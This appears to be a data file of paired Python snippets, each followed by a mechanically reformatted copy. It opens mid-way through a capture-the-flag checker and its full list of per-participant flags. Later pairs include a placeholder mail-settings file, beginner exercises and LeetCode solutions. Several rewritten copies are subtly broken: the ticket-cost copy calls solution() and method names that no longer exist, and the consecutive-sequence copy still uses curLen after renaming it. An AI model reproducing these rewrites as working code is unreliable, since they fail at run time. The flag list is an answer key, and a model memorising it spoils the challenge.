'LKL{s0_uSB_amTDSARe}', 'LKL{s0_uSB_l2YOiB3e}', 'LKL{s0_uSB_5XH9YA4u}', 'LKL{s0_uSB_eZfy5UHM}', 'LKL{s0_uSB_2DZJvImU}', 'LKL{s0_uSB_GLW2W0IN}', 'LKL{s0_uSB_7jV6Bjr0}', 'LKL{s0_uSB_DfSxT8Bb}', 'LKL{s0_uSB_3g6aYaVU}', 'LKL{s0_uSB_uqLkzK6s}', 'LKL{s0_uSB_y7XLKBUK}', 'LKL{s0_uSB_VWXYIS57}', 'LKL{s0_uSB_tHHZKkQN}', 'LKL{s0_uSB_KtsIww2Q}', 'LKL{s0_uSB_EavVOZV6}', 'LKL{s0_uSB_hVq708w2}', 'LKL{s0_uSB_rqafAjQQ}', 'LKL{s0_uSB_SKqWdrJA}', 'LKL{s0_uSB_2SSHIIVT}', 'LKL{s0_uSB_OKO0X4i6}', 'LKL{s0_uSB_HZuhaNri}', 'LKL{s0_uSB_rIFcTWBD}', 'LKL{s0_uSB_FTPLleiX}', 'LKL{s0_uSB_mz3VMpxf}', 'LKL{s0_uSB_TqrtG6VR}', 'LKL{s0_uSB_sgnb9ZgS}', 'LKL{s0_uSB_J6mQWcMI}', 'LKL{s0_uSB_5cIGziPZ}', 'LKL{s0_uSB_hG79x4c9}', 'LKL{s0_uSB_U23Pe1eL}', 'LKL{s0_uSB_NXexMzM8}', 'LKL{s0_uSB_XRzs0Q7k}', 'LKL{s0_uSB_sy3xvNRz}', 'LKL{s0_uSB_1G7Yj5m5}', 'LKL{s0_uSB_EUNESCVL}', 'LKL{s0_uSB_OMWDIbyk}', 'LKL{s0_uSB_HrqtOdMD}', 'LKL{s0_uSB_FxQhXDFG}', 'LKL{s0_uSB_37e6MMOa}', 'LKL{s0_uSB_a7oqenQG}', 'LKL{s0_uSB_Nmcsgvci}', 'LKL{s0_uSB_yDqwIMZb}', 'LKL{s0_uSB_ALA62qns}', 'LKL{s0_uSB_HRDv8wng}', 'LKL{s0_uSB_BwKSkuSY}', 'LKL{s0_uSB_hDv1Efzr}', 'LKL{s0_uSB_XF1Ppirg}', 'LKL{s0_uSB_sYldO74H}', 'LKL{s0_uSB_El02sbrD}', 'LKL{s0_uSB_jYmNuDYi}', 'LKL{s0_uSB_sdu5x4PI}', 'LKL{s0_uSB_l9clRXBV}', 'LKL{s0_uSB_alvSIyGa}', 'LKL{s0_uSB_l862H6oW}', 'LKL{s0_uSB_vL22yC70}', 'LKL{s0_uSB_2EMPVVRo}', 'LKL{s0_uSB_HDhczp76}', 'LKL{s0_uSB_hcFNlokz}', 'LKL{s0_uSB_RdNcHSfc}', 'LKL{s0_uSB_gdlawHdR}']
def check(attempt, context): if attempt.answer == flags[attempt.participant.id % len(flags)]: return checked(True) if attempt.answer in flags: return checked_plagiarist(False, flags.index(attempt.answer)) return checked(False) flags = ['LKL{s0_uSB_PXwlrPxA}', 'LKL{s0_uSB_z7dg8Y9I}', 'LKL{s0_uSB_KjpVWUxa}', 'LKL{s0_uSB_8IZmAon2}', 'LKL{s0_uSB_5iy7DOkp}', 'LKL{s0_uSB_NXz0PcbS}', 'LKL{s0_uSB_MK9Z9UxA}', 'LKL{s0_uSB_DHm7BnWm}', 'LKL{s0_uSB_USBK8T8P}', 'LKL{s0_uSB_s0WXgmVS}', 'LKL{s0_uSB_sZ2bl0wx}', 'LKL{s0_uSB_bUmpg3v6}', 'LKL{s0_uSB_QsCAtWGc}', 'LKL{s0_uSB_OqZ4Rh6S}', 'LKL{s0_uSB_UkbFQRPk}', 'LKL{s0_uSB_BgxoMJvW}', 'LKL{s0_uSB_we3Eyfns}', 'LKL{s0_uSB_nK8NZ3V9}', 'LKL{s0_uSB_DAffGL70}', 'LKL{s0_uSB_5jB2q6nx}', 'LKL{s0_uSB_uDQGRSFA}', 'LKL{s0_uSB_o9HCorcA}', 'LKL{s0_uSB_DhZGBvjk}', 'LKL{s0_uSB_Th0VNVRZ}', 'LKL{s0_uSB_05XYI0kI}', 'LKL{s0_uSB_Ni9vdv9L}', 'LKL{s0_uSB_I4jNsUmz}', 'LKL{s0_uSB_AObxkXcB}', 'LKL{s0_uSB_VURbik9Z}', 'LKL{s0_uSB_eJjyJJbg}', 'LKL{s0_uSB_gHNzhIqT}', 'LKL{s0_uSB_u2RlvRdb}', 'LKL{s0_uSB_6tQLsQjo}', 'LKL{s0_uSB_S58muLc9}', 'LKL{s0_uSB_kIqMOxv6}', 'LKL{s0_uSB_UHksYWu2}', 'LKL{s0_uSB_BORvmw8t}', 'LKL{s0_uSB_WE0otntt}', 'LKL{s0_uSB_I79RmkY1}', 'LKL{s0_uSB_vmlSh0Vl}', 'LKL{s0_uSB_daIh4Pgz}', 'LKL{s0_uSB_ZWaG9wkC}', 'LKL{s0_uSB_e7rNK2Ix}', 'LKL{s0_uSB_2u5WBjKu}', 'LKL{s0_uSB_3Jf8Drmb}', 'LKL{s0_uSB_03JzKMSh}', 'LKL{s0_uSB_GmZA9BKl}', 'LKL{s0_uSB_UZiF6aB2}', 'LKL{s0_uSB_PzBVMMAr}', 'LKL{s0_uSB_gAxkf6cq}', 'LKL{s0_uSB_yAI9plMq}', 'LKL{s0_uSB_UofbTKFx}', 'LKL{s0_uSB_PTjh1XQN}', 'LKL{s0_uSB_BcNoy0zU}', 'LKL{s0_uSB_KmYhwKNJ}', 'LKL{s0_uSB_nE69nc9c}', 'LKL{s0_uSB_w9jJXKJ5}', 'LKL{s0_uSB_HL3lv27S}', 'LKL{s0_uSB_ZdW8tuqW}', 'LKL{s0_uSB_Asbnxljq}', 'LKL{s0_uSB_y4cYmiLh}', 'LKL{s0_uSB_ZDg9jssi}', 'LKL{s0_uSB_4y6Sm4oe}', 'LKL{s0_uSB_gqp8CcfJ}', 'LKL{s0_uSB_qoNvUOlT}', 'LKL{s0_uSB_6nhJr9Py}', 'LKL{s0_uSB_PPYmBaWl}', 'LKL{s0_uSB_R6pVjaFe}', 'LKL{s0_uSB_3sRWoCli}', 'LKL{s0_uSB_y3HFBxQW}', 'LKL{s0_uSB_cDDvYy0o}', 'LKL{s0_uSB_ghzkr4IS}', 'LKL{s0_uSB_j0CK9S5C}', 'LKL{s0_uSB_3gDaVKHC}', 'LKL{s0_uSB_h70tavo1}', 'LKL{s0_uSB_Be1XMRYi}', 'LKL{s0_uSB_opXITTBk}', 'LKL{s0_uSB_BkVQ2FLG}', 'LKL{s0_uSB_mZHr3UWV}', 'LKL{s0_uSB_F4eodMtA}', 'LKL{s0_uSB_AROz9TXs}', 'LKL{s0_uSB_8OxnmLx4}', 'LKL{s0_uSB_KQ0tbg8G}', 'LKL{s0_uSB_gB5rbfDO}', 'LKL{s0_uSB_d1k9qhyP}', 'LKL{s0_uSB_196RP88F}', 'LKL{s0_uSB_mZNBzRjS}', 'LKL{s0_uSB_Wur6Edze}', 'LKL{s0_uSB_6e3Xumeo}', 'LKL{s0_uSB_Tv6v4zWR}', 'LKL{s0_uSB_3GjDBpy9}', 'LKL{s0_uSB_rBVSd0nm}', 'LKL{s0_uSB_ZKBLrwVn}', 'LKL{s0_uSB_vexASoRE}', 'LKL{s0_uSB_cutxmFvf}', 'LKL{s0_uSB_DDwGStSJ}', 'LKL{s0_uSB_JyHGD8ml}', 'LKL{s0_uSB_Ov4vjtrp}', 'LKL{s0_uSB_E6Detcsc}', 'LKL{s0_uSB_furY03Om}', 'LKL{s0_uSB_27o5Mfm8}', 'LKL{s0_uSB_Y3MknTs5}', 'LKL{s0_uSB_eMfhDGyH}', 'LKL{s0_uSB_lqbDKIB1}', 'LKL{s0_uSB_3ivPtu91}', 'LKL{s0_uSB_rZjQpsbI}', 'LKL{s0_uSB_PqZCq6JQ}', 'LKL{s0_uSB_bVnEdI56}', 'LKL{s0_uSB_RRikhcIc}', 'LKL{s0_uSB_HdtiaFDJ}', 'LKL{s0_uSB_Ti2oLD80}', 'LKL{s0_uSB_j3XGW2ta}', 'LKL{s0_uSB_fzmQGa4G}', 'LKL{s0_uSB_7jSAh08B}', 'LKL{s0_uSB_KwqemW2l}', 'LKL{s0_uSB_2bNxaZ3F}', 'LKL{s0_uSB_eM6TYciC}', 'LKL{s0_uSB_XJfJIES1}', 'LKL{s0_uSB_ssosGajS}', 'LKL{s0_uSB_xeu8G26H}', 'LKL{s0_uSB_sgPmRjOk}', 'LKL{s0_uSB_ZqLkqBOg}', 'LKL{s0_uSB_oprmDfmr}', 'LKL{s0_uSB_6nLSXo7j}', 'LKL{s0_uSB_55DwPvWo}', 'LKL{s0_uSB_JVKFLo10}', 'LKL{s0_uSB_6yUaMJrA}', 'LKL{s0_uSB_5Oq5Ti5G}', 'LKL{s0_uSB_AY8ED8CB}', 'LKL{s0_uSB_JRDYR5MH}', 'LKL{s0_uSB_Iks1LoEE}', 'LKL{s0_uSB_q1plTYIn}', 'LKL{s0_uSB_yVLJwxOS}', 'LKL{s0_uSB_6Ux8MUtV}', 'LKL{s0_uSB_5RFTpCIy}', 'LKL{s0_uSB_bnc3s76j}', 'LKL{s0_uSB_g4aYc9wW}', 'LKL{s0_uSB_fTvAQr9W}', 'LKL{s0_uSB_UkBJfK9C}', 'LKL{s0_uSB_TArTY56n}', 'LKL{s0_uSB_amTDSARe}', 'LKL{s0_uSB_l2YOiB3e}', 'LKL{s0_uSB_5XH9YA4u}', 'LKL{s0_uSB_eZfy5UHM}', 'LKL{s0_uSB_2DZJvImU}', 'LKL{s0_uSB_GLW2W0IN}', 'LKL{s0_uSB_7jV6Bjr0}', 'LKL{s0_uSB_DfSxT8Bb}', 'LKL{s0_uSB_3g6aYaVU}', 'LKL{s0_uSB_uqLkzK6s}', 'LKL{s0_uSB_y7XLKBUK}', 'LKL{s0_uSB_VWXYIS57}', 'LKL{s0_uSB_tHHZKkQN}', 'LKL{s0_uSB_KtsIww2Q}', 'LKL{s0_uSB_EavVOZV6}', 'LKL{s0_uSB_hVq708w2}', 'LKL{s0_uSB_rqafAjQQ}', 'LKL{s0_uSB_SKqWdrJA}', 'LKL{s0_uSB_2SSHIIVT}', 'LKL{s0_uSB_OKO0X4i6}', 'LKL{s0_uSB_HZuhaNri}', 'LKL{s0_uSB_rIFcTWBD}', 'LKL{s0_uSB_FTPLleiX}', 'LKL{s0_uSB_mz3VMpxf}', 'LKL{s0_uSB_TqrtG6VR}', 'LKL{s0_uSB_sgnb9ZgS}', 'LKL{s0_uSB_J6mQWcMI}', 'LKL{s0_uSB_5cIGziPZ}', 'LKL{s0_uSB_hG79x4c9}', 'LKL{s0_uSB_U23Pe1eL}', 'LKL{s0_uSB_NXexMzM8}', 'LKL{s0_uSB_XRzs0Q7k}', 'LKL{s0_uSB_sy3xvNRz}', 'LKL{s0_uSB_1G7Yj5m5}', 'LKL{s0_uSB_EUNESCVL}', 'LKL{s0_uSB_OMWDIbyk}', 'LKL{s0_uSB_HrqtOdMD}', 'LKL{s0_uSB_FxQhXDFG}', 'LKL{s0_uSB_37e6MMOa}', 'LKL{s0_uSB_a7oqenQG}', 'LKL{s0_uSB_Nmcsgvci}', 'LKL{s0_uSB_yDqwIMZb}', 'LKL{s0_uSB_ALA62qns}', 'LKL{s0_uSB_HRDv8wng}', 'LKL{s0_uSB_BwKSkuSY}', 'LKL{s0_uSB_hDv1Efzr}', 'LKL{s0_uSB_XF1Ppirg}', 'LKL{s0_uSB_sYldO74H}', 'LKL{s0_uSB_El02sbrD}', 'LKL{s0_uSB_jYmNuDYi}', 'LKL{s0_uSB_sdu5x4PI}', 'LKL{s0_uSB_l9clRXBV}', 'LKL{s0_uSB_alvSIyGa}', 'LKL{s0_uSB_l862H6oW}', 'LKL{s0_uSB_vL22yC70}', 'LKL{s0_uSB_2EMPVVRo}', 'LKL{s0_uSB_HDhczp76}', 'LKL{s0_uSB_hcFNlokz}', 'LKL{s0_uSB_RdNcHSfc}', 'LKL{s0_uSB_gdlawHdR}']
# Settings example file # Edit as needed and save to local_settings.py HOST = "imap.gmail.com" USERNAME = "you@gmail.com" PASSWORD = "IMAPappPassWord" SEARCH_EMAIL = "tom@myspace.com" DOWNLOAD_FOLDER = "." POLLING_INTERVAL = 10000 DATABASE="/home/user/myfinances.gnucash"
host = 'imap.gmail.com' username = 'you@gmail.com' password = 'IMAPappPassWord' search_email = 'tom@myspace.com' download_folder = '.' polling_interval = 10000 database = '/home/user/myfinances.gnucash'
# Whether to run the call graph tracer with debugging enabled. Turning off # `if DEBUG: LOGGER.debug()` code completely yielded massive performance improvements. DEBUG = False FAIL_ON_UNKNOWN_BYTECODE = False
debug = False fail_on_unknown_bytecode = False
# -------------- # Code starts here class_1=['Geoffrey Hinton','Andrew Ng','Sebastian Raschka','Yoshua Bengio'] class_2=['Hilary Mason','Carla Gentry','Corinna Cortes'] new_class = class_1+class_2 print(new_class) new_class.append("Peter Warden") print(new_class) new_class.remove("Carla Gentry") print(new_class) # Code ends here # -------------- # Code starts here courses={'Math':65,'English':70,'History':80,'French':70,'Science':60} print(courses) total=int(courses.get("Math"))+int(courses.get("English"))+int(courses.get("History"))+int(courses.get("French"))+int(courses.get("Science")) print(total) percentage = float((total/500)*100) print(percentage) # Code ends here # -------------- # Code starts here mathematics={'Geoffrey Hinton':78,'Andrew Ng':95,'Sebastian Raschka':65,'Yoshua Benjio':50, 'Hilary Mason':70,'Corinna Cortes':66,'Peter Warden':75} max_marks_scored = max(mathematics,key = mathematics.get) topper =max_marks_scored print(topper) # Code ends here # -------------- # Given string topper = 'andrew ng' # Code starts here first_name = topper.split(" ")[0] last_name = topper.split(" ")[1] print(last_name+" "+first_name) full_name = last_name+" "+first_name certificate_name = full_name.upper() print(certificate_name) # Code ends here
class_1 = ['Geoffrey Hinton', 'Andrew Ng', 'Sebastian Raschka', 'Yoshua Bengio'] class_2 = ['Hilary Mason', 'Carla Gentry', 'Corinna Cortes'] new_class = class_1 + class_2 print(new_class) new_class.append('Peter Warden') print(new_class) new_class.remove('Carla Gentry') print(new_class) courses = {'Math': 65, 'English': 70, 'History': 80, 'French': 70, 'Science': 60} print(courses) total = int(courses.get('Math')) + int(courses.get('English')) + int(courses.get('History')) + int(courses.get('French')) + int(courses.get('Science')) print(total) percentage = float(total / 500 * 100) print(percentage) mathematics = {'Geoffrey Hinton': 78, 'Andrew Ng': 95, 'Sebastian Raschka': 65, 'Yoshua Benjio': 50, 'Hilary Mason': 70, 'Corinna Cortes': 66, 'Peter Warden': 75} max_marks_scored = max(mathematics, key=mathematics.get) topper = max_marks_scored print(topper) topper = 'andrew ng' first_name = topper.split(' ')[0] last_name = topper.split(' ')[1] print(last_name + ' ' + first_name) full_name = last_name + ' ' + first_name certificate_name = full_name.upper() print(certificate_name)
x = int(input()) if(x % 2 == 0 or x % 5 == 0): print(x) else: print("Not a multiple of 2 or 5")
x = int(input()) if x % 2 == 0 or x % 5 == 0: print(x) else: print('Not a multiple of 2 or 5')
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jun 25 06:28:00 2018 @author: tuheenahmmed """ def integerDivision(x, a): """ x: a non-negative integer argument a: a positive integer argument returns: integer, the integer division of x divided by a. """ while x >= a: count += 1 x = x - a return count ''' When we call print(integerDivision(5, 3)) we get the following error message: File "temp.py", line 9, in integerDivision count += 1 UnboundLocalError: local variable 'count' referenced before assignment ''' #debugging solution def integerDivision(x, a): """ x: a non-negative integer argument a: a positive integer argument returns: integer, the integer division of x divided by a. """ count = 0 while x >= a: count += 1 x = x - a return count print(integerDivision(5,3))
""" Created on Mon Jun 25 06:28:00 2018 @author: tuheenahmmed """ def integer_division(x, a): """ x: a non-negative integer argument a: a positive integer argument returns: integer, the integer division of x divided by a. """ while x >= a: count += 1 x = x - a return count '\nWhen we call\n\nprint(integerDivision(5, 3))\nwe get the following error message:\n\nFile "temp.py", line 9, in integerDivision\n count += 1\nUnboundLocalError: local variable \'count\' referenced before assignment\n\n' def integer_division(x, a): """ x: a non-negative integer argument a: a positive integer argument returns: integer, the integer division of x divided by a. """ count = 0 while x >= a: count += 1 x = x - a return count print(integer_division(5, 3))
age = int(input("How old are you? ")) # if age >= 16 and age <=65: # if 16 <= age <=65: if age in range(16, 66): print("Have a good day at work") else: print("Enjoy your free time!") print("-" * 80) if age <16 or age > 65: print("Enjoy your free time!") else: print("Have a good day at work!")
age = int(input('How old are you? ')) if age in range(16, 66): print('Have a good day at work') else: print('Enjoy your free time!') print('-' * 80) if age < 16 or age > 65: print('Enjoy your free time!') else: print('Have a good day at work!')
class Solution: def longestConsecutive(self, nums): """ :type nums: List[int] :rtype: int """ if len(nums) <= 1: return len(nums) nums.sort() length = 0 curLen = 1 for i in range(1, len(nums)): if nums[i] == nums[i-1]+1: curLen += 1 elif nums[i] == nums[i-1]: continue else: length = max(curLen, length) curLen = 1 length = max(curLen, length) return length
class Solution: def longest_consecutive(self, nums): """ :type nums: List[int] :rtype: int """ if len(nums) <= 1: return len(nums) nums.sort() length = 0 cur_len = 1 for i in range(1, len(nums)): if nums[i] == nums[i - 1] + 1: cur_len += 1 elif nums[i] == nums[i - 1]: continue else: length = max(curLen, length) cur_len = 1 length = max(curLen, length) return length
"""Jest helper tools.""" load("@npm//@bazel/typescript:index.bzl", "ts_project") load("@npm//jest-cli:index.bzl", _jest_test = "jest_test") def ts_jest_test(name, srcs, deps = [], **kwargs): """Run a Jest test suite for a TS project. Args: name: name of the resulting test rule srcs: typescript sources deps: typescript/jest dependencies **kwargs: kwargs to pass down to the jest test """ jest_config = "//:jest.ts.config.js" ts_project( name = "%s_ts" % name, srcs = srcs, deps = deps + ["@npm//@types/jest"], declaration = True, tsconfig = "//:tsconfig.json", ) args = [ "--no-cache", "--no-watchman", "--ci", # "--colors", # "--runInBand", # TODO: makes shit faster? ] args.extend(["--config", "$(location %s)" % jest_config]) args.extend(["--runTestsByPath", "$(locations :%s_ts)" % name]) _jest_test( name = name, data = [ ":%s_ts" % name, jest_config, "//:babel.config.json", "@npm//babel-jest", "@npm//@babel/core", "@npm//@babel/preset-env", "@npm//core-js", ] + deps, args = args, **kwargs )
"""Jest helper tools.""" load('@npm//@bazel/typescript:index.bzl', 'ts_project') load('@npm//jest-cli:index.bzl', _jest_test='jest_test') def ts_jest_test(name, srcs, deps=[], **kwargs): """Run a Jest test suite for a TS project. Args: name: name of the resulting test rule srcs: typescript sources deps: typescript/jest dependencies **kwargs: kwargs to pass down to the jest test """ jest_config = '//:jest.ts.config.js' ts_project(name='%s_ts' % name, srcs=srcs, deps=deps + ['@npm//@types/jest'], declaration=True, tsconfig='//:tsconfig.json') args = ['--no-cache', '--no-watchman', '--ci'] args.extend(['--config', '$(location %s)' % jest_config]) args.extend(['--runTestsByPath', '$(locations :%s_ts)' % name]) _jest_test(name=name, data=[':%s_ts' % name, jest_config, '//:babel.config.json', '@npm//babel-jest', '@npm//@babel/core', '@npm//@babel/preset-env', '@npm//core-js'] + deps, args=args, **kwargs)
class Solution: def addBinary(self, a: str, b: str) -> str: ai,bi,carry = len(a)-1,len(b)-1,0 res = '' while ai >= 0 or bi >= 0 or carry: av = int(a[ai]) if ai >= 0 else 0 bv = int(b[bi]) if bi >= 0 else 0 sum3 = av+bv+carry res = str(sum3%2)+res carry = sum3//2 ai,bi = ai-1,bi-1 return res
class Solution: def add_binary(self, a: str, b: str) -> str: (ai, bi, carry) = (len(a) - 1, len(b) - 1, 0) res = '' while ai >= 0 or bi >= 0 or carry: av = int(a[ai]) if ai >= 0 else 0 bv = int(b[bi]) if bi >= 0 else 0 sum3 = av + bv + carry res = str(sum3 % 2) + res carry = sum3 // 2 (ai, bi) = (ai - 1, bi - 1) return res
sprinklers = [[False for j in range(1000)] for i in range(1000)] def checkAndSwap(x1, x2): if (x1 > x2): return (x2, x1) else: return (x1, x2) with open("D:\\Work\\Repositories\\programmingContest\\contest1\\programmingContest1Input2.txt") as file: for line in file: line = line.lower() line = line.replace("turn", "") line = line.replace(",", " ") actions = line.split() (posx1, posx2) = checkAndSwap(int(actions[1]), int(actions[4])) (posy1, posy2) = checkAndSwap(int(actions[2]), int(actions[5])) if (str(actions[0]) == "on"): for i in range(posx1, posx2+1): for j in range(posy1, posy2+1): sprinklers[i][j] = True if (str(actions[0]) == "off"): for i in range(posx1, posx2+1): for j in range(posy1, posy2+1): sprinklers[i][j] = False if (str(actions[0]) == "toggle"): for i in range(posx1, posx2+1): for j in range(posy1, posy2+1): sprinklers[i][j] = not sprinklers[i][j] count = 0 for i in range(1000): for j in range(1000): if (sprinklers[i][j]): count = count + 1 print("Total number of sprinkler heads ON = ", count)
sprinklers = [[False for j in range(1000)] for i in range(1000)] def check_and_swap(x1, x2): if x1 > x2: return (x2, x1) else: return (x1, x2) with open('D:\\Work\\Repositories\\programmingContest\\contest1\\programmingContest1Input2.txt') as file: for line in file: line = line.lower() line = line.replace('turn', '') line = line.replace(',', ' ') actions = line.split() (posx1, posx2) = check_and_swap(int(actions[1]), int(actions[4])) (posy1, posy2) = check_and_swap(int(actions[2]), int(actions[5])) if str(actions[0]) == 'on': for i in range(posx1, posx2 + 1): for j in range(posy1, posy2 + 1): sprinklers[i][j] = True if str(actions[0]) == 'off': for i in range(posx1, posx2 + 1): for j in range(posy1, posy2 + 1): sprinklers[i][j] = False if str(actions[0]) == 'toggle': for i in range(posx1, posx2 + 1): for j in range(posy1, posy2 + 1): sprinklers[i][j] = not sprinklers[i][j] count = 0 for i in range(1000): for j in range(1000): if sprinklers[i][j]: count = count + 1 print('Total number of sprinkler heads ON = ', count)
politician_mapping = { "properties": { "name": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "occupation": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "party": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "portfolio": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "religion": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "electoral": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "dob": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "career": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "civil_status": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, "committees": {"type": "text", "analyzer": "indexing_analyzer", "search_analyzer":"search_analyzer"}, } }
politician_mapping = {'properties': {'name': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'occupation': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'party': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'portfolio': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'religion': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'electoral': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'dob': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'career': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'civil_status': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}, 'committees': {'type': 'text', 'analyzer': 'indexing_analyzer', 'search_analyzer': 'search_analyzer'}}}
class Project: def __init__(self, id, name, country, altitude, currency): self.id = id self.name = name self.country = country self.altitude = altitude self.currency = currency def __str__(self): return "ID: {} \nName: {} \nCountry: {} \nAltitude: {} \nCurrency: {}".format(self.id, self.name, self.country, self.altitude, self.currency)
class Project: def __init__(self, id, name, country, altitude, currency): self.id = id self.name = name self.country = country self.altitude = altitude self.currency = currency def __str__(self): return 'ID: {} \nName: {} \nCountry: {} \nAltitude: {} \nCurrency: {}'.format(self.id, self.name, self.country, self.altitude, self.currency)
#!/usr/bin/env python3 # Thinking process: # This doesn't work # We need 3 DP tables: # TD: at day i, if we have a 1-day pass, the [min cost, days left] # TW: at day i, if we have a 1-week pass, the [min cost, days left] # TM: at day i, if we have a 1-month pass, the [min cost, days left] # Recurrence relation # TD[i] = min(TD[i-1].mincost, TW[i-1].mincost, TM[i-1].mincost) + cost[0] # TW[i] = TW[i-1] if TW[i-1].daysleft > 1 else min(TD[i-1].mincost, TW[i-1].mincost, TM[i-1].mincost) + cost[1] # TM[i] = TM[i-1] if TM[i-1].daysleft > 1 else min(TD[i-1].mincost, TW[i-1].mincost, TM[i-1].mincost) + cost[2] class Solution: def mincostTickets(self, days, costs): cd, cw, cm = costs ld, lw, lm = 1, 7, 30 for d in range(days[0]+1, days[-1]+1): ld, lw, lm = ld-1, lw-1, lm-1 if d in days: m = min(cd, cw, cm) cd, ld = m + costs[0], 1 if lw <= 0: cw, lw = m + costs[1], 7 if lm <= 0: cm, lm = m + costs[2], 30 print(f'd = {d}, ({cd}, {ld}), ({cw}, {lw}), ({cm}, {lm})') def mincostTickets_2(self, days, costs): cd, cw, cm = costs ld, lw, lm = 1, 7, 30 for i in range(1, len(days)): diff = days[i]-days[i-1] ld, lw, lm = ld-diff, lw-diff, lm-diff m = min(cd, cw, cm) cd, ld = m + costs[0], 1 if lw <= 0: cw, lw = m + costs[1], 7 if lm <= 0: cm, lm = m + costs[2], 30 print(f'd = {days[i]}, ({cd}, {ld}), ({cw}, {lw}), ({cm}, {lm})') return min(cd, cw, cm) def mincostTickets_3(self, days, costs): dp = [0]*(days[-1]+1) for i in range(days[-1]+1): if i not in days: dp[i] = dp[i-1] else: dp[i]=min(dp[max(0,i-7)]+costs[1],dp[max(0,i-1)]+costs[0],dp[max(0,i-30)]+costs[2]) print(f'd = {i}, dp[i] = {dp[i]}') return dp[-1] def mincostTickets_noDP(self, days, costs): l = len(days) ret, ix, cost = [float('inf')]*l, [0,0], 0 for i, d in enumerate(days): ret[i] = min(ret[i], cost+costs[0]) for j in range(ix[0], l): if days[j] >= d+7: ix[0] = j break ret[j] = min(ret[j], cost+costs[1]) for j in range(ix[1], l): if days[j] >= d+30: ix[1] = j break ret[j] = min(ret[j], cost+costs[2]) cost = ret[i] print(f'{d}: {ret}') return ret[-1] days = [1,4,6,7,8,20] costs = [7,2,15] days = [4,5,9,11,14,16,17,19,21,22,24] costs = [1,4,18] days = [1,2,3,4,5,6,7,8,9,10,30,31] costs = [2,7,15] days = [1,4,6,7,8,20] costs = [2,7,15] sol = Solution() print(sol.mincostTickets_2(days, costs)) print(sol.mincostTickets_3(days, costs)) print(sol.mincostTickets_noDP(days, costs))
class Solution: def mincost_tickets(self, days, costs): (cd, cw, cm) = costs (ld, lw, lm) = (1, 7, 30) for d in range(days[0] + 1, days[-1] + 1): (ld, lw, lm) = (ld - 1, lw - 1, lm - 1) if d in days: m = min(cd, cw, cm) (cd, ld) = (m + costs[0], 1) if lw <= 0: (cw, lw) = (m + costs[1], 7) if lm <= 0: (cm, lm) = (m + costs[2], 30) print(f'd = {d}, ({cd}, {ld}), ({cw}, {lw}), ({cm}, {lm})') def mincost_tickets_2(self, days, costs): (cd, cw, cm) = costs (ld, lw, lm) = (1, 7, 30) for i in range(1, len(days)): diff = days[i] - days[i - 1] (ld, lw, lm) = (ld - diff, lw - diff, lm - diff) m = min(cd, cw, cm) (cd, ld) = (m + costs[0], 1) if lw <= 0: (cw, lw) = (m + costs[1], 7) if lm <= 0: (cm, lm) = (m + costs[2], 30) print(f'd = {days[i]}, ({cd}, {ld}), ({cw}, {lw}), ({cm}, {lm})') return min(cd, cw, cm) def mincost_tickets_3(self, days, costs): dp = [0] * (days[-1] + 1) for i in range(days[-1] + 1): if i not in days: dp[i] = dp[i - 1] else: dp[i] = min(dp[max(0, i - 7)] + costs[1], dp[max(0, i - 1)] + costs[0], dp[max(0, i - 30)] + costs[2]) print(f'd = {i}, dp[i] = {dp[i]}') return dp[-1] def mincost_tickets_no_dp(self, days, costs): l = len(days) (ret, ix, cost) = ([float('inf')] * l, [0, 0], 0) for (i, d) in enumerate(days): ret[i] = min(ret[i], cost + costs[0]) for j in range(ix[0], l): if days[j] >= d + 7: ix[0] = j break ret[j] = min(ret[j], cost + costs[1]) for j in range(ix[1], l): if days[j] >= d + 30: ix[1] = j break ret[j] = min(ret[j], cost + costs[2]) cost = ret[i] print(f'{d}: {ret}') return ret[-1] days = [1, 4, 6, 7, 8, 20] costs = [7, 2, 15] days = [4, 5, 9, 11, 14, 16, 17, 19, 21, 22, 24] costs = [1, 4, 18] days = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 30, 31] costs = [2, 7, 15] days = [1, 4, 6, 7, 8, 20] costs = [2, 7, 15] sol = solution() print(sol.mincostTickets_2(days, costs)) print(sol.mincostTickets_3(days, costs)) print(sol.mincostTickets_noDP(days, costs))
class Matrix(object): """ The Matrix represents a matrix containing a list of rows. :param matrix_string: The string representing the matrix. :type matrix_string: str :ivar rows: Contains the rows of the matrix :vartype rows: list(list(int)) """ def __init__(self, matrix_string): self.rows = [ [int(column_item) for column_item in row.split()] for row in matrix_string.splitlines() ] def row(self, index): """ Returns the row for a specific index. :param index: Index of the row """ return self.rows[index - 1] def column(self, index): """ Returns the column for a specific index. :param index: index of the column """ return [row[index - 1] for row in self.rows]
class Matrix(object): """ The Matrix represents a matrix containing a list of rows. :param matrix_string: The string representing the matrix. :type matrix_string: str :ivar rows: Contains the rows of the matrix :vartype rows: list(list(int)) """ def __init__(self, matrix_string): self.rows = [[int(column_item) for column_item in row.split()] for row in matrix_string.splitlines()] def row(self, index): """ Returns the row for a specific index. :param index: Index of the row """ return self.rows[index - 1] def column(self, index): """ Returns the column for a specific index. :param index: index of the column """ return [row[index - 1] for row in self.rows]
